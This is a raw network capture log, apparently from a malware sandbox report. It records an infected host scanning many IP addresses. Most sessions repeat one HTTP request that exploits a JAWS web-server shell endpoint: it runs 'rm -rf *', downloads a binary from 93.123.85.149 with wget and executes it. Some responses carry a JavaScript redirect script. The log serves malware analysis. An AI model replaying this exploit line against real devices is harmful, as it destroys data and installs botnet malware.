                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            622192.168.2.235332823.60.235.16280
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:58.656896114 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:58.880716085 CET430INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 208
                                                            Expires: Fri, 26 Jan 2024 14:32:58 GMT
                                                            Date: Fri, 26 Jan 2024 14:32:58 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 31 63 33 36 33 32 31 37 26 23 34 36 3b 31 37 30 36 32 37 39 35 37 38 26 23 34 36 3b 31 32 38 39 32 36 34 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;1c363217&#46;1706279578&#46;1289264</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            623192.168.2.233639823.214.19.21280
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:58.676170111 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:58.918603897 CET430INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 208
                                                            Expires: Fri, 26 Jan 2024 14:32:58 GMT
                                                            Date: Fri, 26 Jan 2024 14:32:58 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 63 37 38 36 31 34 30 32 26 23 34 36 3b 31 37 30 36 32 37 39 35 37 38 26 23 34 36 3b 61 37 33 39 37 32 36 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;c7861402&#46;1706279578&#46;a739726</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            624192.168.2.2350914160.124.107.20080
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:58.726118088 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:59.029444933 CET307INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Fri, 26 Jan 2024 14:32:52 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 150
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            625192.168.2.2347346154.82.127.21380
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:58.755562067 CET1017INHTTP/1.1 200 OK
                                                            Server: NgxFence
                                                            Cache-Control: max-age=3600
                                                            Content-Type: text/html
                                                            Content-Length: 874
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 22 20 69 64 3d 22 68 61 6f 31 32 33 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 4d 61 74 68 2e 69 6d 75 6c 3d 4d 61 74 68 2e 69 6d 75 6c 7c 7c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 6e 3d 36 35 35 33 35 26 74 2c 6f 3d 36 35 35 33 35 26 65 3b 72 65 74 75 72 6e 20 6e 2a 6f 2b 28 28 74 3e 3e 3e 31 36 26 36 35 35 33 35 29 2a 6f 2b 6e 2a 28 65 3e 3e 3e 31 36 26 36 35 35 33 35 29 3c 3c 31 36 3e 3e 3e 30 29 7c 30 7d 3b 63 6f 6e 73 74 20 68 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 6c 65 74 20 65 3d 33 37 33 35 39 32 38 35 35 39 2c 6e 3d 31 31 30 33 35 34 37 39 39 31 3b 66 6f 72 28 6c 65 74 20 6f 2c 61 3d 30 3b 61 3c 74 2e 6c 65 6e 67 74 68 3b 61 2b 2b 29 6f 3d 74 2e 63 68 61 72 43 6f 64 65 41 74 28 61 29 2c 65 3d 4d 61 74 68 2e 69 6d 75 6c 28 65 5e 6f 2c 32 36 35 34 34 33 35 37 36 31 29 2c 6e 3d 4d 61 74 68 2e 69 6d 75 6c 28 6e 5e 6f 2c 31 35 39 37 33 33 34 36 37 37 29 3b 72 65 74 75 72 6e 20 65 3d 4d 61 74 68 2e 69 6d 75 6c 28 65 5e 65 3e 3e 3e 31 36 2c 32 32 34 36 38 32 32 35 30 37 29 5e 4d 61 74 68 2e 69 6d 75 6c 28 6e 5e 6e 3e 3e 3e 31 33 2c 33 32 36 36 34 38 39 39 30 39 29 2c 34 32 39 34 39 36 37 32 39 36 2a 28 32 30 39 37 31 35 31 26 28 6e 3d 4d 61 74 68 2e 69 6d 75 6c 28 6e 5e 6e 3e 3e 3e 31 36 2c 32 32 34 36 38 32 32 35 30 37 29 5e 4d 61 74 68 2e 69 6d 75 6c 28 65 5e 65 3e 3e 3e 31 33 2c 33 32 36 36 34 38 39 39 30 39 29 29 29 2b 28 65 3e 3e 3e 30 29 7d 3b 76 61 72 20 75 3d 22 68 74 74 70 73 3a 2f 2f 33 33 30 31 2e 72 37 74 38 6b 2e 63 6f 6d 2f 3f 68 3d 22 2b 68 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 2b 22 26 70 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 61 73 68 3b 69 66 28 68 61 6f 31 32 33 2e 68 72 65 66 3d 75 2c 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 68 61 6f 31 32 33 22 29 2e 63 6c 69 63 6b 28 29 3b 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 21 30 2c 21 30 29 2c 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 68 61 6f 31 32 33 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                            Data Ascii: <html><head></head><body><a href="" id="hao123"></a><script type="text/javascript">Math.imul=Math.imul||function(t,e){var n=65535&t,o=65535&e;return n*o+((t>>>16&65535)*o+n*(e>>>16&65535)<<16>>>0)|0};const h=function(t){let e=3735928559,n=1103547991;for(let o,a=0;a<t.length;a++)o=t.charCodeAt(a),e=Math.imul(e^o,2654435761),n=Math.imul(n^o,1597334677);return e=Math.imul(e^e>>>16,2246822507)^Math.imul(n^n>>>13,3266489909),4294967296*(2097151&(n=Math.imul(n^n>>>16,2246822507)^Math.imul(e^e>>>13,3266489909)))+(e>>>0)};var u="https://3301.r7t8k.com/?h="+h(window.location.host)+"&p="+window.location.pathname+window.location.search+window.location.hash;if(hao123.href=u,document.all)document.getElementById("hao123").click();else{var e=document.createEvent("MouseEvents");e.initEvent("click",!0,!0),document.getElementById("hao123").dispatchEvent(e)}</script></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            626192.168.2.233944223.43.226.25380
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:58.799926996 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:59.164438963 CET429INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 207
                                                            Expires: Fri, 26 Jan 2024 14:32:59 GMT
                                                            Date: Fri, 26 Jan 2024 14:32:59 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 63 39 36 35 34 36 38 26 23 34 36 3b 31 37 30 36 32 37 39 35 37 39 26 23 34 36 3b 37 62 63 66 35 34 32 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;c965468&#46;1706279579&#46;7bcf542</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            627192.168.2.234413445.14.166.580
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:58.853882074 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:59.051402092 CET306INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 26 Jan 2024 14:32:58 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 146
                                                            Connection: keep-alive
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            628192.168.2.2333900147.154.142.11980
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:58.863656044 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:59.070548058 CET222INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 26 Jan 2024 14:32:58 GMT
                                                            Content-Type: application/javascript
                                                            Content-Length: 7
                                                            Connection: keep-alive
                                                            Keep-Alive: timeout=70
                                                            ETag: "6391c47d-7"
                                                            Data Raw: 2f 2f 21 21 21 0a 0a
                                                            Data Ascii: //!!!


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            629192.168.2.2347368154.82.127.21380
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:58.916644096 CET1017INHTTP/1.1 200 OK
                                                            Server: NgxFence
                                                            Cache-Control: max-age=3600
                                                            Content-Type: text/html
                                                            Content-Length: 874
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 22 20 69 64 3d 22 68 61 6f 31 32 33 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 4d 61 74 68 2e 69 6d 75 6c 3d 4d 61 74 68 2e 69 6d 75 6c 7c 7c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 6e 3d 36 35 35 33 35 26 74 2c 6f 3d 36 35 35 33 35 26 65 3b 72 65 74 75 72 6e 20 6e 2a 6f 2b 28 28 74 3e 3e 3e 31 36 26 36 35 35 33 35 29 2a 6f 2b 6e 2a 28 65 3e 3e 3e 31 36 26 36 35 35 33 35 29 3c 3c 31 36 3e 3e 3e 30 29 7c 30 7d 3b 63 6f 6e 73 74 20 68 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 6c 65 74 20 65 3d 33 37 33 35 39 32 38 35 35 39 2c 6e 3d 31 31 30 33 35 34 37 39 39 31 3b 66 6f 72 28 6c 65 74 20 6f 2c 61 3d 30 3b 61 3c 74 2e 6c 65 6e 67 74 68 3b 61 2b 2b 29 6f 3d 74 2e 63 68 61 72 43 6f 64 65 41 74 28 61 29 2c 65 3d 4d 61 74 68 2e 69 6d 75 6c 28 65 5e 6f 2c 32 36 35 34 34 33 35 37 36 31 29 2c 6e 3d 4d 61 74 68 2e 69 6d 75 6c 28 6e 5e 6f 2c 31 35 39 37 33 33 34 36 37 37 29 3b 72 65 74 75 72 6e 20 65 3d 4d 61 74 68 2e 69 6d 75 6c 28 65 5e 65 3e 3e 3e 31 36 2c 32 32 34 36 38 32 32 35 30 37 29 5e 4d 61 74 68 2e 69 6d 75 6c 28 6e 5e 6e 3e 3e 3e 31 33 2c 33 32 36 36 34 38 39 39 30 39 29 2c 34 32 39 34 39 36 37 32 39 36 2a 28 32 30 39 37 31 35 31 26 28 6e 3d 4d 61 74 68 2e 69 6d 75 6c 28 6e 5e 6e 3e 3e 3e 31 36 2c 32 32 34 36 38 32 32 35 30 37 29 5e 4d 61 74 68 2e 69 6d 75 6c 28 65 5e 65 3e 3e 3e 31 33 2c 33 32 36 36 34 38 39 39 30 39 29 29 29 2b 28 65 3e 3e 3e 30 29 7d 3b 76 61 72 20 75 3d 22 68 74 74 70 73 3a 2f 2f 33 33 30 31 2e 72 37 74 38 6b 2e 63 6f 6d 2f 3f 68 3d 22 2b 68 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 2b 22 26 70 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 61 73 68 3b 69 66 28 68 61 6f 31 32 33 2e 68 72 65 66 3d 75 2c 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 68 61 6f 31 32 33 22 29 2e 63 6c 69 63 6b 28 29 3b 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 21 30 2c 21 30 29 2c 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 68 61 6f 31 32 33 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                            Data Ascii: <html><head></head><body><a href="" id="hao123"></a><script type="text/javascript">Math.imul=Math.imul||function(t,e){var n=65535&t,o=65535&e;return n*o+((t>>>16&65535)*o+n*(e>>>16&65535)<<16>>>0)|0};const h=function(t){let e=3735928559,n=1103547991;for(let o,a=0;a<t.length;a++)o=t.charCodeAt(a),e=Math.imul(e^o,2654435761),n=Math.imul(n^o,1597334677);return e=Math.imul(e^e>>>16,2246822507)^Math.imul(n^n>>>13,3266489909),4294967296*(2097151&(n=Math.imul(n^n>>>16,2246822507)^Math.imul(e^e>>>13,3266489909)))+(e>>>0)};var u="https://3301.r7t8k.com/?h="+h(window.location.host)+"&p="+window.location.pathname+window.location.search+window.location.hash;if(hao123.href=u,document.all)document.getElementById("hao123").click();else{var e=document.createEvent("MouseEvents");e.initEvent("click",!0,!0),document.getElementById("hao123").dispatchEvent(e)}</script></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            630192.168.2.2360720194.164.49.7780
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:58.944458008 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:59.199448109 CET307INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Fri, 26 Jan 2024 14:32:59 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 150
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            631192.168.2.2343484221.143.28.4880
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:59.009996891 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:59.293960094 CET270INHTTP/1.0 400 Bad Request
                                                            Content-Type: text/html
                                                            Content-Length: 113
                                                            Connection: close
                                                            Date: Fri, 26 Jan 2024 14:32:58 GMT
                                                            Server: httpd
                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <html> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            632192.168.2.234100070.122.67.9780
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:33:00.440639019 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            633192.168.2.234157672.21.26.10880
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:33:00.470463991 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:33:00.637939930 CET307INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Fri, 26 Jan 2024 14:33:17 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 150
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            634192.168.2.235583220.93.126.9880
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:33:00.496098995 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            635192.168.2.235889696.16.22.25480
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:33:00.563015938 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:33:00.682166100 CET431INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 209
                                                            Expires: Fri, 26 Jan 2024 14:33:00 GMT
                                                            Date: Fri, 26 Jan 2024 14:33:00 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 33 37 33 61 32 66 31 37 26 23 34 36 3b 31 37 30 36 32 37 39 35 38 30 26 23 34 36 3b 34 35 37 38 37 64 62 63 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;373a2f17&#46;1706279580&#46;45787dbc</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            636192.168.2.234653824.225.30.2280
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:33:00.621045113 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            637192.168.2.233757838.38.65.23080
                                                            TimestampBytes transferredDirectionData
